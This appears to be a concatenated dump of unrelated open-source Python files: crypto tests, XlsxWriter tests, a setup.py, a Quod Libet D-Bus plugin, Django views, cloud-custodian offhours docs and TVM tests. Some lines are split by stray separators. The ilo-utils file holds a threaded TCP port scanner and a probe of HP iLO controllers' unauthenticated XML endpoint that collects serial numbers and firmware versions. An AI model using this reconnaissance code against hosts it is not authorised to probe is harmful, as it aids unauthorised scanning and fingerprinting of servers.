cipher = AES.new(self.key_128, AES.MODE_OCB, nonce=self.nonce_96,
mac_len=mac_len)
_, mac = cipher.encrypt_and_digest(self.data_128)
self.assertEqual(len(mac), mac_len)
# Default MAC length
cipher = AES.new(self.key_128, AES.MODE_OCB, nonce=self.nonce_96)
_, mac = cipher.encrypt_and_digest(self.data_128)
self.assertEqual(len(mac), 16)
def test_invalid_mac(self):
from Cryptodome.Util.strxor import strxor_c
cipher = AES.new(self.key_128, AES.MODE_OCB, nonce=self.nonce_96)
ct, mac = cipher.encrypt_and_digest(self.data_128)
invalid_mac = strxor_c(mac, 0x01)
cipher = AES.new(self.key_128, AES.MODE_OCB, nonce=self.nonce_96)
self.assertRaises(ValueError, cipher.decrypt_and_verify, ct,
invalid_mac)
def test_hex_mac(self):
cipher = AES.new(self.key_128, AES.MODE_OCB, nonce=self.nonce_96)
mac_hex = cipher.hexdigest()
self.assertEqual(cipher.digest(), unhexlify(mac_hex))
cipher = AES.new(self.key_128, AES.MODE_OCB, nonce=self.nonce_96)
cipher.hexverify(mac_hex)
def test_message_chunks(self):
# Validate that both associated data and plaintext/ciphertext
# can be broken up in chunks of arbitrary length
auth_data = get_tag_random("authenticated data", 127)
plaintext = get_tag_random("plaintext", 127)
cipher = AES.new(self.key_128, AES.MODE_OCB, nonce=self.nonce_96)
cipher.update(auth_data)
ciphertext, ref_mac = cipher.encrypt_and_digest(plaintext)
def break_up(data, chunk_length):
return [data[i:i+chunk_length] for i in range(0, len(data),
chunk_length)]
# Encryption
for chunk_length in 1, 2, 3, 7, 10, 13, 16, 40, 80, 128:
cipher = AES.new(self.key_128, AES.MODE_OCB, nonce=self.nonce_9 |
jonstacks13/ilo-utils | ilo_utils/utils.py | Python | bsd-3-clause | 1,788 | 0 | import socket
import threading
from xml.etree import ElementTree
import requests
class PortScan(threading.Thread):
    """Thread that probes one TCP port and records whether it accepted a connection."""

    def __init__(self, ip, port, timeout=2):
        threading.Thread.__init__(self)
        self.ip = ip
        self.port = port
        self.timeout = timeout
        self.open = False

    def run(self):
        """Attempt a TCP connect; set self.open accordingly."""
        probe = socket.socket()
        probe.settimeout(self.timeout)
        try:
            probe.connect((self.ip, self.port))
        except socket.error:
            self.open = False
            return
        probe.close()
        self.open = True
class ILOInfo(threading.Thread):
    """Thread that queries an HP iLO controller's unauthenticated XML endpoint
    (``/xmldata?item=all``) and extracts basic hardware identity fields.

    After run(): ``success`` is True only when the HTTP request returned 200;
    ``serial``/``model`` come from the HSI element, ``ilo_version``/``firmware``
    from the MP element (any of them may remain None if absent).
    """

    def __init__(self, host, timeout=2):
        threading.Thread.__init__(self)
        self.host = host
        self.timeout = timeout
        self.resp = None          # raw requests.Response, kept for callers
        self.serial = None        # chassis serial number (HSI/SBSN)
        self.model = None         # server product name (HSI/SPN)
        self.ilo_version = None   # iLO product name (MP/PN)
        self.firmware = None      # iLO firmware revision (MP/FWRI)
        self.success = False

    def run(self):
        """Fetch and parse the iLO XML; network errors leave success=False."""
        url = 'http://{}/xmldata?item=all'.format(self.host)
        try:
            self.resp = requests.get(url, timeout=self.timeout)
        except requests.exceptions.Timeout:
            pass
        except requests.exceptions.ConnectionError:
            pass
        else:
            if self.resp.status_code == requests.codes.ok:
                self.success = True
                tree = ElementTree.fromstring(self.resp.content)
                hsi = tree.find('HSI')
                if hsi is not None:
                    self.serial = hsi.find('SBSN').text.strip()
                    self.model = hsi.find('SPN').text.strip()
                mp = tree.find('MP')
                if mp is not None:
                    self.ilo_version = mp.find('PN').text.strip()
                    self.firmware = mp.find('FWRI').text.strip()
|
jvrsantacruz/XlsxWriter | xlsxwriter/test/worksheet/test_sparkline07.py | Python | bsd-2-clause | 14,757 | 0.002168 | ###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2015, John McNamara, jmcnamara@cpan.org
#
import unittest
from ...compatibility import StringIO
from ..helperfunctions import _xml_to_list
from ...worksheet import Worksheet
class TestAssembleWorksheet(unittest.TestCase):
"""
Test assembling a complete Worksheet file.
"""
def test_assemble_xml_file(self):
"""Test writing a worksheet with no cell data."""
self.maxDiff = None
fh = StringIO()
worksheet = Worksheet()
worksheet._set_filehandle(fh)
worksheet.select()
worksheet.name = 'Sheet1'
worksheet.excel_version = 2010
data = [-2, 2, 3, -1, 0]
worksheet.write_row('A1', data)
worksheet.write_row('A2', data)
worksheet.write_row('A3', data)
worksheet.write_row('A4', data)
worksheet.write_row('A5', data)
worksheet.write_row('A6', data)
worksheet.write_row('A7', data)
# Set up sparklines.
worksheet.add_sparkline('F1', {'range': 'A1:E1',
'type': 'column',
'high_point': 1})
worksheet.add_sparkline('F2', {'range': 'A2:E2',
'type': 'column',
'low_point': 1})
worksheet.add_sparkline('F3', {'range': 'A3:E3',
'type': 'column',
'negative_points': 1})
worksheet.add_sparkline('F4', {'range': 'A4:E4',
'type': 'column',
'first_point': 1})
worksheet.add_sparkline('F5', {'range': 'A5:E5',
'type': 'column',
'last_point': 1})
worksheet.add_sparkline('F6', {'range': 'A6:E6',
'type': 'column',
'markers': 1})
worksheet.add_sparkline('F7', {'range': 'A7:E7',
'type': 'column',
'high_point': 1,
'low_point': 1,
'negative_points': 1,
'first_point': 1,
'last_point': 1,
'markers': 1})
worksheet._assemble_xml_file()
exp = _xml_to_list("""
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
<dimension ref="A1:E7"/>
<sheetViews>
<sheetView tabSelected="1" workbookViewId="0"/>
</sheetViews>
<sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
<sheetData>
<row r="1" spans="1:5" x14ac:dyDescent="0.25">
<c r="A1">
<v>-2</v>
</c>
<c r="B1">
<v>2</v>
</c>
<c r="C1">
<v>3</v>
</c>
<c r="D1">
<v>-1</v>
</c>
<c r="E1">
<v>0</v>
</c>
</row>
<row r="2" spans="1:5" x14ac:dyDescent="0.25">
<c r="A2">
<v>-2</v>
</c>
<c r="B2">
<v>2</v>
</c>
<c r="C2">
<v>3</v>
</c>
<c r="D2">
<v>-1</v>
</c>
<c r="E2">
<v>0</v>
</c>
</row>
<row r="3" spans="1:5" x14ac:dyDescent="0.25">
<c r="A3">
<v>-2</v>
</c>
<c r="B3">
<v>2</v>
</c>
<c r="C3">
<v>3</v>
</c>
<c r="D3">
<v>-1</v>
</c>
<c r="E3">
<v>0</v>
</c>
</row>
<row r="4" spans="1:5" x14ac:dyDescent="0.25">
<c r="A4">
<v>-2</v>
</c>
<c r="B4">
<v>2</v>
</c>
<c r="C4">
<v>3</v>
</c>
<c r="D4">
<v>-1</v>
</c>
<c r="E4">
<v>0</v>
</c>
</row>
<row r="5" spans="1:5" x14ac:dyDescent="0.25">
<c r="A5">
<v>-2</v>
</c>
<c r="B5">
<v>2</v>
</c>
<c r="C5">
<v>3</v>
</c>
<c r="D5">
<v>-1</v>
</c>
<c r="E5">
<v>0</v>
</c>
</row>
<row r="6" spans="1:5" x14ac:dyDescent="0.25">
<c r="A6">
<v>-2</v>
</c>
<c r="B6">
<v>2</v>
</c>
| <c r="C6">
<v>3</v>
</c>
<c r="D6">
<v | >-1</v>
</c>
<c r="E6">
<v>0</v>
</c>
</row>
<row r="7" spans="1:5" x14ac:dyDescent="0.25">
<c r="A7">
<v>-2</v>
</c>
<c r="B7">
<v>2</v>
</c>
<c r="C7">
<v>3</v>
</c>
<c r="D7">
<v>-1</v>
</c>
<c r="E7">
<v>0</v>
</c>
</row>
</sheetData>
<pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
<extLst>
<ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{05C60535-1F16-4fd2-B633-F4F36F0B64E0}">
<x14:sparklineGroups xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
<x14:sparklineGroup type="column" displayEmptyCellsAs="gap" markers="1" high="1" low="1" first="1" last="1" negative="1">
<x14:colorSeries theme="4" tint="-0.499984740745262"/>
<x14:colorNegative theme="5"/>
<x14:colorAxis rgb="FF000000"/>
<x14:colorMarkers theme="4" tint="-0.499984740745262"/>
<x14:colorFirst theme="4" tint="0.39997558519241921 |
blamarvt/dhcpz | setup.py | Python | apache-2.0 | 662 | 0.042296 | #!/usr/bin/python
from setuptools import setup

setup(
    name="dhcpz",
    version="0.2.0",
    # distutils/setuptools metadata fields expect plain strings, not lists;
    # the original passed lists, which setuptools emits verbatim into
    # PKG-INFO and warns about. Multiple authors are conventionally joined
    # into one comma-separated string.
    author="Nicholas VonHollen, Brian Lamar",
    author_email="nicholas.vonhollen@rackspace.com, brian.lamar@rackspace.com",
    license="Apache License 2.0",
    packages=['dhcpz', 'dhcpz.handlers'],
    package_dir={"": "src/py"},
    install_requires=['gevent', 'netifaces'],
    data_files=[
        ('/etc', ['conf/dhcpz.conf']),
        ('/etc/init.d', ['src/init.d/dhcpz']),
        ('/usr/bin', ['src/bin/dhcpz']),
    ],
)
|
elbeardmorez/quodlibet | quodlibet/quodlibet/ext/events/searchprovider.py | Python | gpl-2.0 | 5,620 | 0 | # -*- coding: utf-8 -*-
# Copyright 2013 Christoph Reiter <reiter.christoph@gmail.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
"""
For this plugin to work GNOME Shell needs this file:
/usr/share/gnome-shell/search-providers/io.github.quodlibet.QuodLibet-search-provider.ini
with the following content:
[Shell Search Provider]
DesktopId=quodlibet.desktop
BusName=io.github.quodlibet.QuodLibet.SearchProvider
ObjectPath=/io/github/quodlibet/QuodLibet/SearchProvider
Version=2
"""
import os
import sys
if os.name == "nt" or sys.platform == "darwin":
from quodlibet.plugins import PluginNotSupportedError
raise PluginNotSupportedError
import dbus
import dbus.service
from quodlibet import _
from quodlibet import app
from quodlibet.util.dbusutils import dbus_unicode_validate
from quodlibet.plugins.events import EventPlugin
from quodlibet.query import Query
from quodlibet.plugins import PluginImportException
from quodlibet.util.path import xdg_get_system_data_dirs
from quodlibet.qltk import Icons
def get_gs_provider_files():
    """Collect every installed GNOME Shell search-provider .ini file."""
    found = []
    for base in xdg_get_system_data_dirs():
        provider_dir = os.path.join(base, "gnome-shell", "search-providers")
        try:
            entries = os.listdir(provider_dir)
        except EnvironmentError:
            # Directory missing or unreadable in this data dir; skip it.
            continue
        found.extend(
            os.path.join(provider_dir, name)
            for name in entries
            if name.endswith(".ini"))
    return found
def check_ini_installed():
    """Raise if no GNOME Shell ini file for Quod Libet is found"""

    quodlibet_installed = False
    for path in get_gs_provider_files():
        try:
            with open(path, "rb") as handle:
                # Decode permissively; we only need a substring match on
                # the D-Bus bus name to recognise our provider file.
                data = handle.read().decode("utf-8", "replace")
                if SearchProvider.BUS_NAME in data:
                    quodlibet_installed = True
                    break
        except EnvironmentError:
            # Unreadable file — keep scanning the remaining candidates.
            pass

    if not quodlibet_installed:
        # PluginImportException makes the plugin loader report this as a
        # missing prerequisite rather than a crash.
        raise PluginImportException(
            _("No GNOME Shell search provider for "
              "Quod Libet installed."))
class GnomeSearchProvider(EventPlugin):
    """Quod Libet plugin wrapper: registers/unregisters the D-Bus search
    provider when the plugin is toggled."""

    PLUGIN_ID = "searchprovider"
    PLUGIN_NAME = _("GNOME Search Provider")
    PLUGIN_DESC = _("Allows GNOME Shell to search the library.")
    PLUGIN_ICON = Icons.SYSTEM_SEARCH

    def enabled(self):
        # Exporting the object claims the bus name and object path.
        self.obj = SearchProvider()

    def disabled(self):
        # Unexport from D-Bus, then drop the reference and collect promptly
        # so the bus name is released immediately.
        self.obj.remove_from_connection()
        del self.obj

        import gc
        gc.collect()
# Serialized GIcon string sent to GNOME Shell so each search result shows a
# themed audio-file icon (with mime-type fallbacks).
ENTRY_ICON = (". GThemedIcon audio-mpeg gnome-mime-audio-mpeg "
              "audio-x-generic")
def get_song_id(song):
    """Return a stable (per-process) string identifier for *song*."""
    identifier = id(song)
    return str(identifier)
def get_songs_for_ids(library, ids):
    """Map identifier strings back to the song objects in *library*.

    Preserves library order and stops scanning as soon as every requested
    identifier has been matched.
    """
    wanted = set(ids)
    matched = []
    for song in library:
        key = str(id(song))  # inlined get_song_id()
        if key in wanted:
            matched.append(song)
            wanted.discard(key)
        if not wanted:
            break
    return matched
class SearchProvider(dbus.service.Object):
    """D-Bus object implementing the org.gnome.Shell.SearchProvider2
    interface so GNOME Shell can query the library and activate results.
    """

    PATH = "/io/github/quodlibet/QuodLibet/SearchProvider"
    BUS_NAME = "io.github.quodlibet.QuodLibet.SearchProvider"
    IFACE = "org.gnome.Shell.SearchProvider2"

    def __init__(self):
        bus = dbus.SessionBus()
        name = dbus.service.BusName(self.BUS_NAME, bus)
        super(SearchProvider, self).__init__(name, self.PATH)

    @dbus.service.method(IFACE, in_signature="as", out_signature="as")
    def GetInitialResultSet(self, terms):
        # An empty term list means "everything"; otherwise AND all terms.
        if terms:
            query = Query("")
            for term in terms:
                query &= Query(term)
            songs = filter(query.search, app.library)
        else:
            songs = app.library.values()

        ids = [get_song_id(s) for s in songs]
        return ids

    @dbus.service.method(IFACE, in_signature="asas", out_signature="as")
    def GetSubsearchResultSet(self, previous_results, terms):
        # Narrow the previous result set instead of searching from scratch.
        query = Query("")
        for term in terms:
            query &= Query(term)

        songs = get_songs_for_ids(app.library, previous_results)
        ids = [get_song_id(s) for s in songs if query.search(s)]
        return ids

    @dbus.service.method(IFACE, in_signature="as",
                         out_signature="aa{sv}")
    def GetResultMetas(self, identifiers):
        metas = []
        for song in get_songs_for_ids(app.library, identifiers):
            name = song("title")
            description = song("~artist~title")
            song_id = get_song_id(song)
            # Shell rejects invalid UTF-8, so validate the user strings.
            meta = dbus.Dictionary({
                "name": dbus_unicode_validate(name),
                "id": song_id,
                "description": dbus_unicode_validate(description),
                "gicon": ENTRY_ICON,
            }, signature="ss")
            metas.append(meta)
        return metas

    @dbus.service.method(IFACE, in_signature="sasu")
    def ActivateResult(self, identifier, terms, timestamp):
        songs = get_songs_for_ids(app.library, [identifier])
        if not songs:
            return

        if app.player.go_to(songs[0], True):
            app.player.paused = False

    @dbus.service.method(IFACE, in_signature="asu")
    def LaunchSearch(self, terms, timestamp):
        try:
            app.window.browser.filter_text(" ".join(terms))
        except NotImplementedError:
            # Not every browser supports text filtering; ignore then.
            pass
        else:
            app.present()
# the plugin is useless without the ini file...
check_ini_installed()
|
uclouvain/osis_louvain | base/views/learning_units/detail.py | Python | agpl-3.0 | 2,249 | 0.001335 | ############################################################################
#
# OSIS stands for Open Student Information System. It's an application
# designed to manage the core business of higher education institutions,
# such as universities, faculties, institutes and professional schools.
# The core business involves the administration of students, teachers,
# courses, programs and so on.
#
# Copyright (C) 2015-2018 Université catholique de Louvain (http://www.uclouvain.be)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public Lice | nse as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General P | ublic License for more details.
#
# A copy of this license - GNU General Public License - is available
# at the root of the source code of this program. If not,
# see http://www.gnu.org/licenses/.
#
############################################################################
from django.contrib.auth.decorators import login_required
from django.core.exceptions import PermissionDenied
from django.shortcuts import get_object_or_404, render
from base.models.person import Person
from base.views.learning_units.common import get_learning_unit_identification_context
@login_required
def learning_unit_identification(request, learning_unit_year_id):
    """Render the identification page of a learning unit year.

    External learning units use a dedicated template and permission;
    access is denied when the user lacks the matching permission.
    """
    person = get_object_or_404(Person, user=request.user)
    context = get_learning_unit_identification_context(learning_unit_year_id, person)

    if context['learning_unit_year'].is_external():
        template, permission = ("learning_unit/external/read.html",
                                'base.can_access_externallearningunityear')
    else:
        template, permission = ("learning_unit/identification.html",
                                'base.can_access_learningunit')

    if not person.user.has_perm(permission):
        raise PermissionDenied
    return render(request, template, context)
|
skygate/CodeSamples | python/abstract_base_classes/base.py | Python | unlicense | 507 | 0 | import abc
class BaseBroker(metaclass=abc.ABCMeta):
    """Abstract interface every CRM broker implementation must provide."""

    @abc.abstractmethod
    def get_contact_url(self, email):
        """Get contact's profile URL from CRM.

        :param email: Contact's email
        """
        pass

    @abc.abstractmethod
    def create_contact(self, email, first_name, last_name):
        """Create contact in CRM and return contact's URL.

        :param email: Contact's email
        :param first_name: Contact's first_name
        :param last_name: Contact's last_name
        """
        pass
|
sixfeetup/cloud-custodian | c7n/filters/offhours.py | Python | apache-2.0 | 21,487 | 0.000558 | # Copyright 2015-2017 Capital One Services, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Resource Scheduling Offhours
============================
Custodian provides for time based filters, that allow for taking periodic
action on a resource, with resource schedule customization based on tag values.
A common use is offhours scheduling for asgs and instances.
Features
========
- Flexible offhours scheduling with opt-in, opt-out selection, and timezone
support.
- Resume during offhours support.
- Can be combined with other filters to get a particular set (
resources with tag, vpc, etc).
- Can be combined with arbitrary actions
Policy Configuration
====================
We provide an `onhour` and `offhour` time filter, each should be used in a
different policy, they support the same configuration options:
- **weekends**: default true, whether to leave resources off for the weekend
- **weekend-only**: default false, whether to turn the resource off only on
the weekend
- **default_tz**: which timezone to utilize when evaluating time **(REQUIRED)**
- **tag**: which resource tag name to use for per-resource configuration
(schedule and timezone overrides and opt-in/opt-out); default is
``maid_offhours``.
- **opt-out**: Determines the behavior for resources which do not have a tag
matching the one specified for **tag**. Values can be either ``false`` (the
default) where the policy operates on an opt-in basis and resources must have
the tag in order to be acted on by the policy, or ``true`` where the policy
operates on an opt-out basis, and resources without the tag are acted on by
the policy.
- **onhour**: the default time to start/run resources, specified as 0-23
- **offhour**: the default time to stop/suspend resources, specified as 0-23
This example policy overrides most of the defaults for an offhour policy:
.. code-block:: yaml
policies:
- name: offhours-stop
resource: ec2
filters:
- type: offhour
weekends: false
default_tz: pt
tag: downtime
opt-out: true
onhour: 8
offhour: 20
Tag Based Configuration
=======================
Resources can use a special tag to override the default configuration on a
per-resource basis. Note that the name of the tag is configurable via the
``tag`` option in the policy; the examples below use the default tag name,
``maid_offhours``.
The value of the tag must be one of the following:
- **(empty)** or **on** - An empty tag value or a value of "on" implies night
and weekend offhours using the default time zone configured in the policy
(tz=est if unspecified) and the default onhour and offhour values configured
in the policy.
- **off** - If offhours is configured to run in opt-out mode, this tag can be
specified to disable offhours on a given instance. If offhours is configured
to run in opt-in mode, this tag will have no effect (the resource will still
be opted out).
- a semicolon-separated string composed of one or more of the following
components, which override the defaults specified in the policy:
* ``tz=<timezone>`` to evaluate with a resource-specific timezone, where
``<timezone>`` is either one of the supported timezone aliases defined in
:py:attr:`c7n.filters.offhours.Time.TZ_ALIASES` (such as ``pt``) or the name
of a geographic timezone identifier in
[IANA's tzinfo database](https://www.iana.org/time-zones), such as
``Americas/Los_Angeles``. *(Note all timezone aliases are
referenced to a locality to ensure taking into account local daylight
savings time, if applicable.)*
* ``off=(time spec)`` and/or ``on=(time spec)`` matching time specifications
supported by :py:class:`c7n.filters.offhours.ScheduleParser` as described
in the next section.
ScheduleParser Time Specifications
----------------------------------
Each time specification follows the format ``(days,hours)``. Multiple time
specifications can be combined in square-bracketed lists, i.e.
``[(days,hours),(days,hours),(days,hours)]``.
**Examples**::
# up mon-fri from 7am-7pm; eastern time
off=(M-F,19);on=(M-F,7)
# up mon-fri from 6am-9pm; up sun from 10am-6pm; pacific time
off=[(M-F,21),(U,18)];on=[(M-F,6),(U,10)];tz=pt
**Possible values**:
+------------+----------------------+
| field | values |
+============+======================+
| days | M, T, W, H, F, S, U |
+------------+----------------------+
| hours | 0, 1, 2, ..., 22, 23 |
+------------+----------------------+
Days can be specified in a range (ex. M-F).
Policy examples
===============
Turn ec2 instances on and off
.. code-block:: yaml
policies:
- name: offhours-stop
resource: ec2
filters:
- type: offhour
actions:
- stop
- name: offhours-start
resource: ec2
filters:
- type: onhour
actions:
- start
Here's doing the same with auto scale groups
.. code-block:: yaml
policies:
- name: asg-offhours-stop
resource: asg
filters:
- offhour
actions:
- suspend
- name: asg-onhours-start
resource: asg
filters:
- onhour
actions:
- resume
Additional policy examples and resource-type-specific information can be seen in
the :ref:`EC2 Offhours <ec2offhours>` and :ref:`ASG Offhours <asgoffhours>`
use cases.
Resume During Offhours
======================
These policies are evaluated hourly; during each run (once an hour),
cloud-custodian will act on **only** the resources tagged for that **exact**
hour. In other words, if a resource has an offhours policy of
stopping/suspending at 23:00 Eastern daily and starting/resuming at 06:00
Eastern daily, and you run cloud-custodian once an hour via Lambda, that
resource will only be stopped once a day sometime between 23:00 and 23:59, and
will only be started once a day sometime between 06:00 and 06:59. If the current
hour do | es not *exactly* match the hour specified in the policy, nothing will be
done at all.
As a result of this, if custodian stops an instance or suspends an ASG and you
need to start/resume it, you can safe | ly do so manually and custodian won't touch
it again until the next day.
ElasticBeanstalk, EFS and Other Services with Tag Value Restrictions
====================================================================
A number of AWS services have restrictions on the characters that can be used
in tag values, such as `ElasticBeanstalk <http://docs.aws.amazon.com/elasticbean
stalk/latest/dg/using-features.tagging.html>`_ and `EFS <http://docs.aws.amazon.
com/efs/latest/ug/API_Tag.html>`_. In particular, these services do not allow
parenthesis, square brackets, commas, or semicolons, or empty tag values. This
proves to be problematic with the tag-based schedule configuration described
above. The best current workaround is to define a separate policy with a unique
``tag`` name for each unique schedule that you want to use, and then tag
resources with that tag name and a value of ``on``. Note that this can only be
used in opt-in mode, not opt-out.
"""
from __future__ import absolute_import, division, print_function, unicode_literals
# note we have to module import for our testing mocks
import datetime
import logging
from os.path import join
from dateutil import zoneinfo
from c7n.filters import Filter, FilterValidationError
from c7n.utils import type_schema, dumps
log = logging.getLogger('custodian.offhours')
def brackets_removed(u):
return u.translate({ord |
tqchen/tvm | tests/python/relay/test_backend_compile_engine.py | Python | apache-2.0 | 9,932 | 0.001208 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import numpy as np
import tvm
from tvm import te
import tvm.testing
from tvm import relay
from tvm import autotvm
from tvm import topi
from tvm.relay.testing import run_infer_type
from tvm.relay.testing.temp_op_attr import TempOpAttr
import tvm.testing
@autotvm.register_topi_compute("test/conv2d_1")
def _compute_conv2d_1(cfg, input, filter, strides, padding, dilation, out_dtype):
    """AutoTVM-templated NCHW conv2d compute for the test task "conv2d_1"."""
    return topi.nn.conv2d_nchw(input, filter, strides, padding, dilation, out_dtype)


@autotvm.register_topi_schedule("test/conv2d_1")
def _schedule_conv2d_1(cfg, outs):
    """Generic schedule paired with _compute_conv2d_1."""
    return topi.generic.schedule_conv2d_nchw(outs)
@autotvm.register_topi_compute("test/conv2d_2")
def _compute_conv2d_2(cfg, input, filter, strides, padding, dilation, out_dtype):
    """AutoTVM-templated NCHW conv2d compute for the test task "conv2d_2"."""
    return topi.nn.conv2d_nchw(input, filter, strides, padding, dilation, out_dtype)


@autotvm.register_topi_schedule("test/conv2d_2")
def _schedule_conv2d_2(cfg, outs):
    """Generic schedule paired with _compute_conv2d_2."""
    return topi.generic.schedule_conv2d_nchw(outs)
def _compute_conv2d_3(input, filter, strides, padding, dilation, out_dtype):
    """Plain (non-AutoTVM) NCHW conv2d compute used by the test strategy."""
    return topi.nn.conv2d_nchw(input, filter, strides, padding, dilation, out_dtype)


def _schedule_conv2d_3(outs):
    """Generic schedule paired with _compute_conv2d_3."""
    return topi.generic.schedule_conv2d_nchw(outs)
@tvm.target.override_native_generic_func("test_conv2d_strategy")
def _tmp_strategy(attrs, inputs, out_type, target):
    """Test-only conv2d op strategy with three implementations.

    conv2d_1 (plevel 10) and conv2d_2 (plevel 15) are always registered;
    conv2d_3 (plevel 20) is registered under a SpecializedCondition and is
    only valid when the input-channel dimension is at least 16.
    """
    strategy = relay.op.OpStrategy()
    strategy.add_implementation(
        relay.op.strategy.wrap_compute_conv2d(_compute_conv2d_1),
        relay.op.strategy.wrap_topi_schedule(_schedule_conv2d_1),
        name="conv2d_1",
        plevel=10,
    )
    strategy.add_implementation(
        relay.op.strategy.wrap_compute_conv2d(_compute_conv2d_2),
        relay.op.strategy.wrap_topi_schedule(_schedule_conv2d_2),
        name="conv2d_2",
        plevel=15,
    )
    # NCHW layout: inputs[0].shape[1] is the number of input channels.
    ic = inputs[0].shape[1]
    with tvm.te.SpecializedCondition(ic >= 16):
        strategy.add_implementation(
            relay.op.strategy.wrap_compute_conv2d(_compute_conv2d_3),
            relay.op.strategy.wrap_topi_schedule(_schedule_conv2d_3),
            name="conv2d_3",
            plevel=20,
        )
    return strategy
def _create_record(task_name, dshape, wshape, target, cost):
    """Build a fake AutoTVM (MeasureInput, MeasureResult) tuning record.

    A minimal ConfigEntity carrying *cost* is attached so that history-based
    selection can rank records by their measured cost.
    """
    args = [te.placeholder(dshape), te.placeholder(wshape), (1, 1), (1, 1, 1, 1), (1, 1), "float32"]
    task = autotvm.task.create(task_name, args, target)
    cfg = autotvm.ConfigEntity(0, None, {}, [])
    cfg.cost = cost
    inp = autotvm.MeasureInput(target=target, task=task, config=cfg)
    result = autotvm.MeasureResult(costs=(cost,), error_no=0, all_cost=-1, timestamp=-1)
    return (inp, result)
def test_get_valid_implementations():
    """The SpecializedCondition in _tmp_strategy gates which impls are valid."""
    target = tvm.target.Target("llvm")

    def _get_impls(dshape, wshape):
        # Build a conv2d call and ask the compile engine which of the
        # strategy's implementations apply to these shapes.
        data = relay.var("data", shape=dshape)
        weight = relay.var("wshape", shape=wshape)
        out = relay.nn.conv2d(data, weight, padding=(1, 1))
        out = run_infer_type(out)
        return relay.backend.compile_engine.get_valid_implementations(
            relay.op.get("nn.conv2d"),
            out.attrs,
            [te.placeholder(dshape), te.placeholder(wshape)],
            out.checked_type,
            target,
        )

    with TempOpAttr("nn.conv2d", "FTVMStrategy", _tmp_strategy):
        # ic == 8: the ic >= 16 condition rules out conv2d_3.
        impls = _get_impls((1, 8, 7, 7), (32, 8, 3, 3))
        assert len(impls) == 2
        # ic == 16: all three implementations are valid.
        impls = _get_impls((1, 16, 7, 7), (32, 16, 3, 3))
        assert len(impls) == 3
def test_select_implementation():
    """Without tuning logs the highest plevel wins; with logs the records win."""
    target = tvm.target.Target("llvm")

    def _select_impl(dshape, wshape, use_autotvm=False):
        # Build a conv2d call and let the compile engine pick one impl.
        data = relay.var("data", shape=dshape)
        weight = relay.var("wshape", shape=wshape)
        out = relay.nn.conv2d(data, weight, padding=(1, 1))
        out = run_infer_type(out)
        return relay.backend.compile_engine.select_implementation(
            relay.op.get("nn.conv2d"),
            out.attrs,
            [te.placeholder(dshape), te.placeholder(wshape)],
            out.checked_type,
            target,
            use_autotvm,
        )

    with TempOpAttr("nn.conv2d", "FTVMStrategy", _tmp_strategy):
        # No records yet: plevel decides (conv2d_2 beats conv2d_1; conv2d_3
        # wins whenever its ic >= 16 specialization holds).
        impl, _ = _select_impl((1, 8, 7, 7), (32, 8, 3, 3))
        assert impl.name == "conv2d_2"
        impl, _ = _select_impl((1, 8, 7, 7), (32, 8, 3, 3), True)
        assert impl.name == "conv2d_2"
        impl, _ = _select_impl((1, 16, 7, 7), (32, 16, 3, 3))
        assert impl.name == "conv2d_3"
        impl, _ = _select_impl((1, 16, 7, 7), (32, 16, 3, 3), True)
        assert impl.name == "conv2d_3"

        # add autotvm record
        records = []
        records.append(_create_record("test/conv2d_1", (1, 8, 7, 7), (32, 8, 3, 3), target, 0.5))
        records.append(_create_record("test/conv2d_1", (1, 16, 7, 7), (32, 16, 3, 3), target, 1.0))
        with target:
            with autotvm.apply_history_best(records):
                # Tuned conv2d_1 now overrides the plevel-based choice.
                impl, _ = _select_impl((1, 8, 7, 7), (32, 8, 3, 3), True)
                assert impl.name == "conv2d_1"
                impl, _ = _select_impl((1, 16, 7, 7), (32, 16, 3, 3), True)
                assert impl.name == "conv2d_1"

        # A cheaper conv2d_2 record (0.2 < 0.5) wins for the first workload
        # only; the second workload still prefers its best conv2d_1 record.
        records.append(_create_record("test/conv2d_2", (1, 8, 7, 7), (32, 8, 3, 3), target, 0.2))
        records.append(_create_record("test/conv2d_1", (1, 16, 7, 7), (32, 16, 3, 3), target, 1.2))
        with target:
            with autotvm.apply_history_best(records):
                impl, _ = _select_impl((1, 8, 7, 7), (32, 8, 3, 3), True)
                assert impl.name == "conv2d_2"
                impl, _ = _select_impl((1, 16, 7, 7), (32, 16, 3, 3), True)
                assert impl.name == "conv2d_1"
def test_compile_engine():
    """Lowering results are cached per (function, target) by the engine."""
    engine = relay.backend.compile_engine.get()

    def get_func(shape):
        # main(x) = (x + x) + x, i.e. 3 * x element-wise.
